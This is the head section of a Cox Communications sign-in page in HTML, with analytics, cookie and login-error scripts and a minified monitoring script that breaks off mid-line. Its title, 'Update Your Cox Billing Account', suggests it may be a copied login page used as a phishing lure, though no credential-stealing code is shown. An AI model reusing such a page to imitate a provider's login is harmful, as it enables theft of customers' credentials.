<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
	<head>
		<title>Update Your Cox Billing Account | Cox Communications</title>
		<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
		<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, user-scalable=0" />
		<link rel="shortcut icon" type="image/vnd.microsoft.icon" href="https://webcdn3.cox.com/ui/presentation/tsw/faviconrebrand.ico">

		<!-- header/footer css -->
		<link href="https://webcdn2.cox.com/ui/presentation/tsw/css/presentation.css.jgz" rel="stylesheet" />
		<!-- global css -->
		<link href="https://webcdn2.cox.com/ui/5_0/tsw/css/all.css.jgz" rel="stylesheet" />
		<!-- LOB css -->
		<link href="https://webcdn2.cox.com/ui/5_0/tsw/css/residential.css.jgz" rel="stylesheet" />

		<!-- ie conditional css -->
		<!--[if lte IE 9]>
			<link href="https://webcdn2.cox.com/ui/presentation/tsw/css/presentation-ie.css" rel="stylesheet" />
		<![endif]-->

		<style>
			.login-content-div {
				margin-bottom: 20px;
				margin-top: 7px;
			}
			.sign-in-lock {
				background: url(https://webcdn2.cox.com/ui/5_0/tsw/img/global/icons/lock.png) no-repeat;
				display: inline-block;
				height: 17px;
				width: 14px;
				margin-top: 15px;
				margin-left: 15px;
			}
			@media screen and (max-width: 767px) {
				.sign-in-validate {
					margin-top: 15px;
					background-image: url(https://webcdn2.cox.com/ui/5_0/tsw/img/global/icons/lock.png),linear-gradient(#2757a7,#1d4c9b) !important;
					background-repeat: no-repeat,repeat!important;
					background-position: 63% 50%!important;
					background-position: calc(50% - -45px) 100%!important;
				}
				.hero-block .position-content-mobile-top {
					top: 20px !important;
				}
				.hero-slim {
					text-align: center;
				}
			}
			@media screen and (min-width: 600px) and (max-width: 1100px) {
				#consolidated-signin {
					margin-left: 75px;
				}
			}
		</style>
		
		<link href="https://webcdn3.cox.com/ui/presentation/tsw/css/rebrand.css.jgz" rel="stylesheet"/>
		<style>
			.footer-footer {
			  font-size: 11px;
			  padding: 20px 0 5px 0;
			  text-align: center;
			}

			@media only screen and (max-width: 767px) {
			  .pf-header-residential {
				height: 59px!important;
			  }
			  .pf-header-wrapper.pf-mobile-header {
				height: 0!important;
			  }
			}

			@media only screen and (min-width: 768px) {
			  .pf-main-header .pf-main-nav .pf-main-nav-primary-links li {
				height: 45px;
				margin-top: 20px;
				padding: 5px 6px 0 10px;
			  }

			  .pf-main-header .pf-main-nav .pf-main-nav-primary-links li a {
				line-height: 35px;
			  }

			  .pf-main-nav .pf-main-left-nav li.header-logo {
				margin-left: 0;
			  }

			  .pf-main-nav .pf-main-left-nav li.header-logo a {
				border: 1px solid transparent;
			  }

			  .pf-main-nav .pf-main-left-nav li.header-logo a:focus {
				border: 1px solid transparent;
			  }

			  /* Footer */
			  .cox-footer-container {
				padding: 0;
				max-width: none;
			  }
			}
		</style>

		<script src="https://webcdn2.cox.com/ui/5_0/tsw/js/jquery.js.jgz"></script>
		<script src="https://webcdn2.cox.com/ui/5_0/tsw/js/lib.js.jgz"></script>
		<script src="https://webcdn2.cox.com/ui/5_0/tsw/js/cox.js.jgz"></script>

		<script>
			// Check the given cookie for a value and return it.
			function getCoxCookies(cookieName) {
				var cookies = document.cookie.split('; ');

				for (var i = 0; i < cookies.length; i++) {
					var parts = cookies[i].split('=');
					if (parts[0] === cookieName) {
						if (parts[1].length > 0 && parts[1] !== '""') {
							return unescape(parts[1].replace(/\+/g, ' '));
						}
					}
				};
			};

			var utag_data = {
				"businessUnit": "res:myaccount",
				"channel": "cox:res:myaccount",
				"dateStamp": "",
				"language": "en",
				"pageName": "cox:res:myaccount:sign-in",
				"pageType": "myaccount",
				"purchaseStep": "myaccount",
				"responsiveDisplayType": "desktop",
				"selfHelpName": "signin:page",
				"subSection": "cox:res:myaccount",
				"visitCount": "",
				"visitorLoginStatus": "loggedout",
				"zip": ""
			};

			utag_data.dateStamp = new Date().getTime();
			utag_data.visitCount = "";

			if (getCoxCookies("cox-current-zipcode")) {
				utag_data.zip = getCoxCookies("cox-current-zipcode");
			}

			if (getCoxCookies("tealiumMyAccount")) {
				var tealiumMyAccount = getCoxCookies("tealiumMyAccount");
				tealiumMyAccount = tealiumMyAccount.replace('"', ''); // remove leading quote
				tealiumMyAccount = window.atob(tealiumMyAccount).split("=")[1]; // get count from myAccountVisitCount=X
				utag_data.visitCount = tealiumMyAccount;
			}

			// set the responsiveDisplayType
			if (window.matchMedia) {
				var respDesktopCheck = window.matchMedia("(min-width: 941px)");
				var respTabletCheck = window.matchMedia("(max-width: 940px) and (min-width: 768px)");
				var respMobileCheck = window.matchMedia("(max-width: 767px)");

				if (respDesktopCheck.matches) {
					utag_data.responsiveDisplayType = 'desktop';
				}
				if (respTabletCheck.matches) {
					utag_data.responsiveDisplayType = 'tablet';
				}
				if (respMobileCheck.matches) {
					utag_data.responsiveDisplayType = 'mobile';
				}
			}

			// load utag.js
			(function(a,b,c,d){
			a='//tags.tiqcdn.com/utag/cox/main/prod/utag.js';
			b=document;c='script';d=b.createElement(c);d.src=a;
			d.type='text/java'+c;d.async=true;
			a=b.getElementsByTagName(c)[0];a.parentNode.insertBefore(d,a);
			})();

			// error strings
			var CciFrameworkStrings = {"login":
				{"2-4":"An invalid User ID or Password was entered. Please try again.",
				"2-3":"An invalid User ID or Password was entered. Please try again.",
				"2-2":"An invalid User ID or Password was entered. Please try again.",
				"2-1":"An invalid User ID or Password was entered. Please try again.",
				"2-0":"An invalid User ID or Password was entered. Please try again.",
				"3-0":"Too many invalid logins have been attempted. Please try again in 30 minutes.",
				"1-0":"We're currently having trouble verifying your Sign-In. Please try again later.",
				"5-0":"We're currently having trouble verifying your Sign-In. Please try again later.",
				"15098759-0":"An invalid User ID or Password was entered. Please try again.",
				"75196832-0":"An invalid User ID or Password was entered. Please try again.",
				"2-":"An invalid User ID or Password was entered. Please try again."}
			};

			$(function() {
				// validate the username field for allowed characters
				$('.sign-in-validate').click(function() {
				var a=$("#username");
				var txt = $('.txtdesc').val();
				var re = /^[A-Za-z0-9_.-]{3,32}$/
					$.validator.addMethod("validate-username", function(value,element){
						 if (!re.test(txt)) {
							return false ;
						 } else {
							return true;   // PASS validation otherwise
							a.removeClass("error");

						}
					},"User ID contains an invalid character.");
				})

				// init the login errors and onsuccess/onfailure values
				consolidatedlogin.init();
			});

			var consolidatedlogin = {
				init: function() {
					this.getIdmErrors();
					// store the current url in a private var for faster response
					var _currentUrl = this.currentUrl();

					// get the remember me cookie value, base-64 decode it and set the username field
					if (getCoxCookies("cox-rememberme-user")) {
						var _currentUser = getCoxCookies("cox-rememberme-user");
						_currentUser = window.atob(_currentUser);
						$("#username").val(_currentUser);
					}

					// replace the onsuccess hidden field if there is an onsuccess param in the url
					var _onsuccessUrl = this.queryParamsFromUrl("onsuccess");
					if (_onsuccessUrl != '') {
						$("#consolidated-signin input[name='onsuccess']").val(_onsuccessUrl);
					}

					// set the finalview query param on links that end in finalview=
					var finalViewURL = $("#onsuccess").val();
					$('#consolidated-signin a').each(function() {
						var $this = $(this);
						var _href = $this.attr("href");
						if (_href.indexOf("finalview=") >= 0) {
							$this.attr("href", _href + finalViewURL);
						}
					});

					// update the onfailure hidden field to replace the onsuccess query param in it with the one in the url
					$("#consolidated-signin input[name='onfailure']").val(_currentUrl);
				},

				currentUrl : function() {
					// http or https
					var siteProtocol = window.location.protocol;
					// ie, www.cox.com
					var siteHost = window.location.host;
					// ie, /residential/home.html
					var sitePath = window.location.pathname;
					// ie, autherror=2
					var queryParams = window.location.href.split("?")[1];
					var newKeyValuePair = "";

					if (queryParams !== undefined) {
						// split querystring into key/value pairs
						var pairs = queryParams.split("&");
						var pairsLength = pairs.length;

						$.each(pairs, function(i, val) {
							// each key/value pair
							var keyValuePair = pairs[i].split("=");

							// the key name
							var paramName = keyValuePair[0];

							// the key value
							var paramValue = keyValuePair[1];

							if (paramValue === undefined)
								paramValue = "";

							// exclude certain querystrings from being appended
							if (paramName !== "autherror" && paramName !== "flr" && paramName !== "zip" && paramName !== "onfailure" ) {
								newKeyValuePair += paramName + "=" + paramValue;
								if (i < pairsLength - 1)
									newKeyValuePair += "&";
							}
						});
						if (newKeyValuePair !== "")
							newKeyValuePair = "?" + newKeyValuePair;
					}

					// rebuild the url and encode it
					var pageUrl = siteProtocol + "//" + siteHost + sitePath;

					// remove invalid characters creeping up in query urls causing 403 errors to idm
					// remove any ticks (encoded and not encoded) from the url
					newKeyValuePair = newKeyValuePair.replace("'", "");
					newKeyValuePair = newKeyValuePair.replace("%27", "");

					// encode the final url (do not want to encode any query strings which are already encoded)
					pageUrl = encodeURI(pageUrl) + newKeyValuePair;

					return pageUrl;
				},

				queryParamsFromUrl : function(queryParamKey) {
					var uri = window.location.href.split("?")[1];
					var queryParams = {};
					if (uri) {
						uri.replace(new RegExp("([^?=&]+)(=([^&]*))?", "g"), function($0, $1, $2, $3) {
							queryParams[$1] = $3;
						});
					}
					var queryParamVal = queryParams[queryParamKey];
					if (queryParamVal) {
						return queryParamVal;
					} else {
						return "";
					}
				},

				getLoginErrors: function() {
					if (CciFrameworkStrings !== "") {
						return CciFrameworkStrings["login"];
					} else {
						return "";
					}
				},

				getIdmErrors: function() {
					// check if we have error messages defined, otherwise skip this processing
					if (this.getLoginErrors() !== undefined) {
						// add sign in errors (read query params and match with inline json)
						// format: autherror querystring + "-" + flr querystring
						var uri = window.location.search;
						if (uri) {
							var queryParams = {};

							uri.slice(1).replace(new RegExp("([^?=&]+)(=([^&]*))?", "g"), function($0, $1, $2, $3) {
								queryParams[$1] = $3;
							});

							var autherror = queryParams["autherror"];
							var flr = queryParams["flr"];

							// handle querystrings that might not appear in url
							if (autherror === undefined)
								autherror = "";
							if (flr === undefined)
								flr = "";

							// match the error string to the querystring params
							var idmError = this.getLoginErrors()[autherror + "-" + flr];

							// handle unknown error codes to the user
							if (idmError === undefined)
								idmError = "We're sorry, an unexpected error has occurred. Please try again.";

							// expand sign in overlay with errors, if present
							if (autherror !== "" || flr !== "") {
								$(".login-error").html("<p>" + idmError + "</p>");
								$(".login-error").css("display", "block");
							}
						}
					}
				}
			};
		</script>

		<!-- RELIC MONITORING SCRIPT BEGIN -->
		<script>
			window.NREUM||(NREUM={}),__nr_require=function(t,e,n){function r(n){if(!e[n]){var o=e[n]={exports:{}};t[n][0].call(o.exports,function(e){var o=t[n][1][e];return r(o||e)},o,o.exports)}return e[n].exports}if("function"==typeof __nr_require)return __nr_require;for(var o=0;o<n.length;o++)r(n[o]);return r}({1:[function(t,e,n){function r(t){try{c.console&&console.log(t)}catch(e){}}var o,i=t("ee"),a=t(19),c={};try{o=localStorage.getItem("__nr_flags").split(","),console&&"function"==typeof console.log&&(c.console=!0,o.indexOf("dev")!==-1&&(c.dev=!0),o.indexOf("nr_dev")!==-1&&(c.nrDev=!0))}catch(s){}c.nrDev&&i.on("internal-error",function(t){r(t.stack)}),c.dev&&i.on("fn-err",function(t,e,n){r(n.stack)}),c.dev&&(r("NR AGENT IN DEVELOPMENT MODE"),r("flags: "+a(c,function(t,e){return t}).join(", ")))},{}],2:[function(t,e,n){function r(t,e,n,r,o){try{h?h-=1:i("err",[o||new UncaughtException(t,e,n)])}catch(c){try{i("ierr",[c,(new Date).getTime(),!0])}catch(s){}}return"function"==typeof f&&f.apply(this,a(arguments))}function UncaughtException(t,e,n){this.message=t||"Uncaught error with no additional information",this.sourceURL=e,this.line=n}function o(t){i("err",[t,(new Date).getTime()])}var i=t("handle"),a=t(20),c=t("ee"),s=t("loader"),f=window.onerror,u=!1,h=0;s.features.err=!0,t(1),window.onerror=r;try{throw new Error}catch(d){"stack"in d&&(t(12),t(11),"addEventListener"in window&&t(6),s.xhrWrappable&&t(13),u=!0)}c.on("fn-start",function(t,e,n){u&&(h+=1)}),c.on("fn-err",function(t,e,n){u&&(this.thrown=!0,o(n))}),c.on("fn-end",function(){u&&!this.thrown&&h>0&&(h-=1)}),c.on("internal-error",function(t){i("ierr",[t,(new Date).getTime(),!0])})},{}],3:[function(t,e,n){t("loader").features.ins=!0},{}],4:[function(t,e,n){function r(){j++,S=y.hash,this[u]=Date.now()}function o(){j--,y.hash!==S&&i(0,!0);var t=Date.now();this[l]=~~this[l]+t-this[u],this[h]=t}function i(t,e){x.emit("newURL",[""+y,e])}function a(t,e){t.on(e,function(){this[e]=Date.now()})}var c="-start",s="-end",f="-body",u="fn"+c,h="fn"+s,d="cb"+c,p="cb"+s,l="jsTime",m="fetch",v="addEventListener",w=window,y=w.location;if(w[v]){var g=t(9),b=t(10),x=t(8),E=t(6),T=t(12),O=t(7),R=t(13),P=t("ee"),D=P.get("tracer");t(14),t("loader").features.spa=!0;var S,N=w[v],j=0;P.on(u,r),P.on(d,r),P.on(h,o),P.on(p,o),P.buffer([u,h,"xhr-done","xhr-resolved"]),E.buffer([u]),T.buffer(["setTimeout"+s,"clearTimeout"+c,u]),R.buffer([u,"new-xhr","send-xhr"+c]),O.buffer([m+c,m+"-done",m+f+c,m+f+s]),x.buffer(["newURL"]),g.buffer([u]),b.buffer(["propagate",d,p,"executor-err","resolve"+c]),D.buffer([u,"no-"+u]),a(R,"send-xhr"+c),a(P,"xhr-resolved"),a(P,"xhr-done"),a(O,m+c),a(O,m+"-done"),x.on("pushState-end",i),x.on("replaceState-end",i),N("hashchange",i,!0),N("load",i,!0),N("popstate",function(){i(0,j>1)},!0)}},{}],5:[function(t,e,n){function r(t){}if(window.performance&&window.performance.timing&&window.performance.getEntriesByType){var o=t("ee"),i=t("handle"),a=t(12),c=t(11),s="learResourceTimings",f="addEventListener",u="resourcetimingbufferfull",h="bstResource",d="resource",p="-start",l="-end",m="fn"+p,v="fn"+l,w="bstTimer",y="pushState";t("loader").features.stn=!0,t(8);var g=NREUM.o.EV;o.on(m,function(t,e){var n=t[0];n instanceof g&&(this.bstStart=Date.now())}),o.on(v,function(t,e){var n=t[0];n instanceof g&&i("bst",[n,e,this.bstStart,Date.now()])}),a.on(m,function(t,e,n){this.bstStart=Date.now(),this.bstType=n}),a.on(v,function(t,e){i(w,[e,this.bstStart,Date.now(),this.bstType])}),c.on(m,function(){this.bstStart=Date.now()}),c.on(v,function(t,e){i(w,[e,this.bstStart,Date.now(),"requestAnimationFrame"])}),o.on(y+p,function(t){this.time=Date.now(),this.startPath=location.pathname+location.hash}),o.on(y+l,function(t){i("bstHist",[location.pathname+location.hash,this.startPath,this.time])}),f in window.performance&&(window.performance["c"+s]?window.performance[f](u,function(t){i(h,[window.performance.getEntriesByType(d)]),window.performance["c"+s]()},!1):window.performance[f]("webkit"+u,function(t){i(h,[window.performance.getEntriesByType(d)]),window.performance["webkitC"+s]()},!1)),document[f]("scroll",r,{passive:!0}),document[f]("keypress",r,!1),document[f]("click",r,!1)}},{}],6:[function(t,e,n){function r(t){for(var e=t;e&&!e.hasOwnProperty(u);)e=Object.getPrototypeOf(e);e&&o(e)}function o(t){c.inPlace(t,[u,h],"-",i)}function i(t,e){return t[1]}var a=t("ee").get("events"),c=t(21)(a,!0),s=t("gos"),f=XMLHttpRequest,u="addEventListener",h="removeEventListener";e.exports=a,"getPrototypeOf"in Object?(r(document),r(window),r(f.prototype)):f.prototype.hasOwnProperty(u)&&(o(window),o(f.prototype)),a.on(u+"-start",function(t,e){var n=t[1],r=s(n,"nr@wrapped",function(){function t(){if("function"==typeof n.handleEvent)return n.handleEvent.apply(n,arguments)}var e={object:t,"function":n}[typeof n];return e?c(e,"fn-",null,e.name||"anonymous"):n});this.wrapped=t[1]=r}),a.on(h+"-start",function(t){t[1]=this.wrapped||t[1]})},{}],7:[function(t,e,n){function r(t,e,n){var r=t[e];"function"==typeof r&&(t[e]=function(){var t=r.apply(this,arguments);return o.emit(n+"start",arguments,t),t.then(function(e){return o.emit(n+"end",[null,e],t),e},function(e){throw o.emit(n+"end",[e],t),e})})}var o=t("ee").get("fetch"),i=t(19);e.exports=o;var a=window,c="fetch-",s=c+"body-",f=["arrayBuffer","blob","json","text","formData"],u=a.Request,h=a.Response,d=a.fetch,p="prototype";u&&h&&d&&(i(f,function(t,e){r(u[p],e,s),r(h[p],e,s)}),r(a,"fetch",c),o.on(c+"end",function(t,e){var n=this;e?e.clone().arrayBuffer().then(function(t){n.rxSize=t.byteLength,o.emit(c+"done",[null,e],n)}):o.emit(c+"done",[t],n)}))},{}],8:[function(t,e,n){var r=t("ee").get("history"),o=t(21)(r);e.exports=r,o.inPlace(window.history,["pushState","replaceState"],"-")},{}],9:[function(t,e,n){var r=t("ee").get("mutation"),o=t(21)(r),i=NREUM.o.MO;e.exports=r,i&&(window.MutationObserver=function(t){return this instanceof i?new i(o(t,"fn-")):i.apply(this,arguments)},MutationObserver.prototype=i.prototype)},{}],10:[function(t,e,n){function r(t){var e=a.context(),n=c(t,"executor-",e),r=new f(n);return a.context(r).getCtx=function(){return e},a.emit("new-promise",[r,e],e),r}function o(t,e){return e}var i=t(21),a=t("ee").get("promise"),c=i(a),s=t(19),f=NREUM.o.PR;e.exports=a,f&&(window.Promise=r,["all","race"].forEach(function(t){var e=f[t];f[t]=function(n){function r(t){return function(){a.emit("propagate",[null,!o],i),o=o||!t}}var o=!1;s(n,function(e,n){Promise.resolve(n).then(r("all"===t),r(!1))});var i=e.apply(f,arguments),c=f.resolve(i);return c}}),["resolve","reject"].forEach(function(t){var e=f[t];f[t]=function(t){var n=e.apply(f,arguments);return t!==n&&a.emit("propagate",[t,!0],n),n}}),f.prototype["catch"]=function(t){return this.then(null,t)},f.prototype=Object.create(f.prototype,{constructor:{value:r}}),s(Object.getOwnPropertyNames(f),function(t,e){try{r[e]=f[e]}catch(n){}}),a.on("executor-start",function(t){t[0]=c(t[0],"resolve-",this),t[1]=c(t[1],"resolve-",this)}),a.on("executor-err",function(t,e,n){t[1](n)}),c.inPlace(f.prototype,["then"],"then-",o),a.on("then-start",function(t,e){this.promise=e,t[0]=c(t[0],"cb-",this),t[1]=c(t[1],"cb-",this)}),a.on("then-end",function(t,e,n){this.nextPromise=n;var r=this.promise;a.emit("propagate",[r,!0],n)}),a.on("cb-end",function(t,e,n){a.emit("propagate",[n,!0],this.nextPromise)}),a.on("propagate",function(t,e,n){this.getCtx&&!e||(this.getCtx=function(){if(t instanceof Promise)var e=a.context(t);return e&&e.getCtx?e.getCtx():this})}),r.toString=function(){return""+f})},{}],11:[function(t,e,n){var r=t("ee").get("raf"),o=t(21)(r),i="equestAnimationFrame";e.exports=r,o.inPlace(window,["r"+i,"mozR"+i,"webkitR"+i,"msR"+i],"raf-"),r.on("raf-start",function(t){t[0]=o(t[0],"fn-")})},{}],12:[function(t,e,n){function r(t,e,n){t[0]=a(t[0],"fn-",null,n)}function o(t,e,n){this.method=n,this.timerDuration="number"==typeof t[1]?t[1]:0,t[0]=a(t[0],"fn-",this,n)}var i=t("ee").get("timer"),a=t(21)(i),c="setTimeout",s="setInterval",f="clearTimeout",u="-start",h="-";e.exports=i,a.inPlace(window,[c,"setImmediate"],c+h),a.inPlace(window,[s],s+h),a.inPlace(window,[f,"clearImmediate"],f+h),i.on(s+u,r),i.on(c+u,o)},{}],13:[function(t,e,n){function r(t,e){h.inPlace(e,["onreadystatechange"],"fn-",c)}function o(){var t=this,e=u.context(t);t.readyState>3&&!e.resolved&&(e.resolved=!0,u.emit("xhr-resolved",[],t)),h.inPlace(t,v,"fn-",c)}function i(t){w.push(t),l&&(g=-g,b.data=g)}function a(){for(var t=0;t<w.length;t++)r([],w[t]);w.length&&(w=[])}function c(t,e){return e}function s(t,e){for(var n in t)e[n]=t[n];return e}t(6);var f=t("ee"),u=f.get("xhr"),h=t(21)(u),d=NREUM.o,p=d.XHR,l=d.MO,m="readystatechange",v=["onload","onerror","onabort","onloadstart","onloadend","onprogress","ontimeout"],w=[];e.exports=u;var y=window.XMLHttpRequest=function(t){var e=new p(t);try{u.emit("new-xhr",[e],e),e.addEventListener(m,o,!1)}catch(n){try{u.emit("internal-error",[n])}catch(r){}}return e};if(s(p,y),y.prototype=p.prototype,h.inPlace(y.prototype,["open","send"],"-xhr-",c),u.on("send-xhr-start",function(t,e){r(t,e),i(e)}),u.on("open-xhr-start",r),l){var g=1,b=document.createTextNode(g);new l(a).observe(b,{characterData:!0})}else f.on("fn-end",function(t){t[0]&&t[0].type===m||a()})},{}],14:[function(t,e,n){function r(t){var e=this.params,n=this.metrics;if(!this.ended){this.ended=!0;for(var r=0;r<h;r++)t.removeEventListener(u[r],this.listener,!1);if(!e.aborted){if(n.duration=(new Date).getTime()-this.startTime,4===t.readyState){e.status=t.status;var i=o(t,this.lastSize);if(i&&(n.rxSize=i),this.sameOrigin){var a=t.getResponseHeader("X-NewRelic-App-Data");a&&(e.cat=a.split(", ").pop())}}else e.status=0;n.cbTime=this.cbTime,f.emit("xhr-done",[t],t),c("xhr",[e,n,this.startTime])}}}function o(t,e){var n=t.responseType;if("json"===n&&null!==e)return e;var r="arraybuffer"===n||"blob"===n||"json"===n?t.response:t.responseText;return l(r)}function i(t,e){var n=s(e),r=t.params;r.host=n.hostname+":"+n.port,r.pathname=n.pathname,t.sameOrigin=n.sameOrigin}var a=t("loader");if(a.xhrWrappable){var c=t("handle"),s=t(15),f=t("ee"),u=["load","error","abort","timeout"],h=u.length,d=t("id"),p=t(18),l=t(17),m=window.XMLHttpRequest;a.features.xhr=!0,t(13),f.on("new-xhr",function(t){var e=this;e.totalCbs=0,e.called=0,e.cbTime=0,e.end=r,e.ended=!1,e.xhrGuids={},e.lastSize=null,p&&(p>34||p<10)||window.opera||t.addEventListener("progress",function(t){e.lastSize=t.loaded},!1)}),f.on("open-xhr-start",function(t){this.params={method:t[0]},i(this,t[1]),this.metrics={}}),f.on("open-xhr-end",function(t,e){"loader_config"in NREUM&&"xpid"in NREUM.loader_config&&this.sameOrigin&&e.setRequestHeader("X-NewRelic-ID",NREUM.loader_config.xpid)}),f.on("send-xhr-start",function(t,e){var n=this.metrics,r=t[0],o=this;if(n&&r){var i=l(r);i&&(n.txSize=i)}this.startTime=(new Date).getTime(),this.listener=function(t){try{"abort"===t.type&&(o.params.aborted=!0),("load"!==t.type||o.called===o.totalCbs&&(o.onloadCalled||"function"!=typeof e.onload))&&o.end(e)}catch(n){try{f.emit("internal-error",[n])}catch(r){}}};for(var a=0;a<h;a++)e.addEventListener(u[a],this.listener,!1)}),f.on("xhr-cb-time",function(t,e,n){this.cbTime+=t,e?this.onloadCalled=!0:this.called+=1,this.called!==this.totalCbs||!this.onloadCalled&&"function"==typeof n.onload||this.end(n)}),f.on("xhr-load-added",function(t,e){var n=""+d(t)+!!e;this.xhrGuids&&!this.xhrGuids[n]&&(this.xhrGuids[n]=!0,this.totalCbs+=1)}),f.on("xhr-load-removed",function(t,e){var n=""+d(t)+!!e;this.xhrGuids&&this.xhrGuids[n]&&(delete this.xhrGuids[n],this.totalCbs-=1)}),f.on("addEventListener-end",function(t,e){e instanceof m&&"load"===t[0]&&f.emit("xhr-load-added",[t[1],t[2]],e)}),f.on("removeEventListener-end",function(t,e){e instanceof m&&"load"===t[0]&&f.emit("xhr-load-removed",[t[1],t[2]],e)}),f.on("fn-start",function(t,e,n){e instanceof m&&("onload"===n&&(this.onload=!0),("load"===(t[0]&&t[0].type)||this.onload)&&(this.xhrCbStart=(new Date).getTime()))}),f.on("fn-end",function(t,e){this.xhrCbStart&&f.emit("xhr-cb-time",[(new Date).getTime()-this.xhrCbStart,this.onload,e],e)})}},{}],15:[function(t,e,n){e.exports=function(t){var e=document.createElement("a"),n=window.location,r={};e.href=t,r.port=e.port;var o=e.href.split("://");!r.port&&o[1]&&(r.port=o[1].split("/")[0].split("@").pop().split(":")[1]),r.port&&"0"!==r.port||(r.port="https"===o[0]?"443":"80"),r.hostname=e.hostname||n.hostname,r.pathname=e.pathname,r.protocol=o[0],"/"!==r.pathname.charAt(0)&&(r.pathname="/"+r.pathname);var i=!e.protocol||":"===e.protocol||e.protocol===n.protocol,a=e.hostname===document.domain&&e.port===n.port;return r.sameOrigin=i&&(!e.hostname||a),r}},{}],16:[function(t,e,n){function r(){}function o(t,e,n){return function(){return i(t,[(new Date).getTime()].concat(c(arguments)),e?null:this,n),e?void 0:this}}var i=t("handle"),a=t(19),c=t(20),s=t("ee").get("tracer"),f=NREUM;"undefined"==typeof window.newrelic&&(newrelic=f);var u=["setPageViewName","setCustomAttribute","setErrorHandler","finished","addToTrace","inlineHit","addRelease"],h="api-",d=h+"ixn-";a(u,function(t,e){f[e]=o(h+e,!0,"api")}),f.addPageAction=o(h+"addPageAction",!0),f.setCurrentRouteName=o(h+"routeName",!0),e.exports=newrelic,f.interaction=function(){return(new r).get()};var p=r.prototype={createTracer:function(t,e){var n={},r=this,o="function"==typeof e;return i(d+"tracer",[Date.now(),t,n],r),function(){if(s.emit((o?"":"no-")+"fn-start",[Date.now(),r,o],n),o)try{return e.apply(this,arguments)}finally{s.emit("fn-end",[Date.now()],n)}}}};a("setName,setAttribute,save,ignore,onEnd,getContext,end,get".split(","),function(t,e){p[e]=o(d+e)}),newrelic.noticeError=function(t){"string"==typeof t&&(t=new Error(t)),i("err",[t,(new Date).getTime()])}},{}],17:[function(t,e,n){e.exports=function(t){if("string"==typeof t&&t.length)return t.length;if("object"==typeof t){if("undefined"!=typeof ArrayBuffer&&t instanceof ArrayBuffer&&t.byteLength)return t.byteLength;if("undefined"!=typeof Blob&&t instanceof Blob&&t.size)return t.size;if(!("undefined"!=typeof FormData&&t instanceof FormData))try{return JSON.stringify(t).length}catch(e){return}}}},{}],18:[function(t,e,n){var r=0,o=navigator.userAgent.match(/Firefox[\/\s](\d+\.\d+)/);o&&(r=+o[1]),e.exports=r},{}],19:[function(t,e,n){function r(t,e){var n=[],r="",i=0;for(r in t)o.call(t,r)&&(n[i]=e(r,t[r]),i+=1);return n}var o=Object.prototype.hasOwnProperty;e.exports=r},{}],20:[function(t,e,n){function r(t,e,n){e||(e=0),"undefined"==typeof n&&(n=t?t.length:0);for(var r=-1,o=n-e||0,i=Array(o<0?0:o);++r<o;)i[r]=t[e+r];return i}e.exports=r},{}],21:[function(t,e,n){function r(t){return!(t&&t instanceof Function&&t.apply&&!t[a])}var o=t("ee"),i=t(20),a="nr@original",c=Object.prototype.hasOwnProperty,s=!1;e.exports=function(t,e){function n(t,e,n,o){function nrWrapper(){var r,a,c,s;try{a=this,r=i(arguments),c="function"==typeof n?n(r,a):n||{}}catch(f){d([f,"",[r,a,o],c])}u(e+"start",[r,a,o],c);try{return s=t.apply(a,r)}catch(h){throw u(e+"err",[r,a,h],c),h}finally{u(e+"end",[r,a,s],c)}}return r(t)?t:(e||(e=""),nrWrapper[a]=t,h(t,nrWrapper),nrWrapper)}function f(t,e,o,i){o||(o="");var a,c,s,f="-"===o.charAt(0);for(s=0;s<e.length;s++)c=e[s],a=t[c],r(a)||(t[c]=n(a,f?c+o:o,i,c))}function u(n,r,o){if(!s||e){var i=s;s=!0;try{t.emit(n,r,o)}catch(a){d([a,n,r,o])}s=i}}function h(t,e){if(Object.defineProperty&&Object.keys)try{var n=Object.keys(t);return n.forEach(function(n){Object.defineProperty(e,n,{get:function(){return t[n]},set:function(e){return t[n]=e,e}})}),e}catch(r){d([r])}for(var o in t)c.call(t,o)&&(e[o]=t[o]);return e}function d(e){try{t.emit("internal-error",e)}catch(n){}}return t||(t=o),n.inPlace=f,n.flag=a,n}},{}],ee:[function(t,e,n){function r(){}function o(t){function e(t){return t&&t instanceof r?t:t?s(t,c,i):i()}function n(n,r,o){if(!d.aborted){t&&t(n,r,o);for(var i=e(o),a=l(n),c=a.length,s=0;s<c;s++)a[s].apply(i,r);var f=u[y[n]];return f&&f.push([g,n,r,i]),i}}function p(t,e){w[t]=l(t).concat(e)}function l(t){return w[t]||[]}function m(t){return h[t]=h[t]||o(n)}function v(t,e){f(t,function(t,n){e=e||"feature",y[n]=e,e in u||(u[e]=[])})}var w={},y={},g={on:p,emit:n,get:m,listeners:l,context:e,buffer:v,abort:a,aborted:!1};return g}function i(){return new r}function a(){(u.api||u.feature)&&(d.aborted=!0,u=d.backlog={})}var c="nr@context",s=t("gos"),f=t(19),u={},h={},d=e.exports=o();d.backlog=u},{}],gos:[function(t,e,n){function r(t,e,n){if(o.call(t,e))return t[e];var r=n();if(Object.defineProperty&&Object.keys)try{return Object.defineProperty(t,e,{value:r,writable:!0,enumerable:!1}),r}catch(i){}return t[e]=r,r}var o=Object.prototype.hasOwnProperty;e.exports=r},{}],handle:[function(t,e,n){function r(t,e,n,r){o.buffer([t],r),o.emit(t,e,n)}var o=t("ee").get("handle");e.exports=r,r.ee=o},{}],id:[function(t,e,n){function r(t){var e=typeof t;return!t||"object"!==e&&"function"!==e?-1:t===window?0:a(t,i,function(){return o++})}var o=1,i="nr@id",a=t("gos");e.exports=r},{}],loader:[function(t,e,n){function r(){if(!b++){var t=g.info=NREUM.info,e=h.getElementsByTagName("script")[0];if(setTimeout(f.abort,3e4),!(t&&t.licenseKey&&t.applicationID&&e))return f.abort();s(w,function(e,n){t[e]||(t[e]=n)}),c("mark",["onload",a()],null,"api");var n=h.createElement("script");n.src="https://"+t.agent,e.parentNode.insertBefore(n,e)}}function o(){"complete"===h.readyState&&i()}function i(){c("mark",["domContent",a()],null,"api")}function a(){return(new Date).getTime()}var c=t("handle"),s=t(19),f=t("ee"),u=window,h=u.document,d="addEventListener",p="attachEvent",l=u.XMLHttpRequest,m=l&&l.prototype;NREUM.o={ST:setTimeout,CT:clearTimeout,XHR:l,REQ:u.Request,EV:u.Event,PR:u.Promise,MO:u.MutationObserver},t(16);var 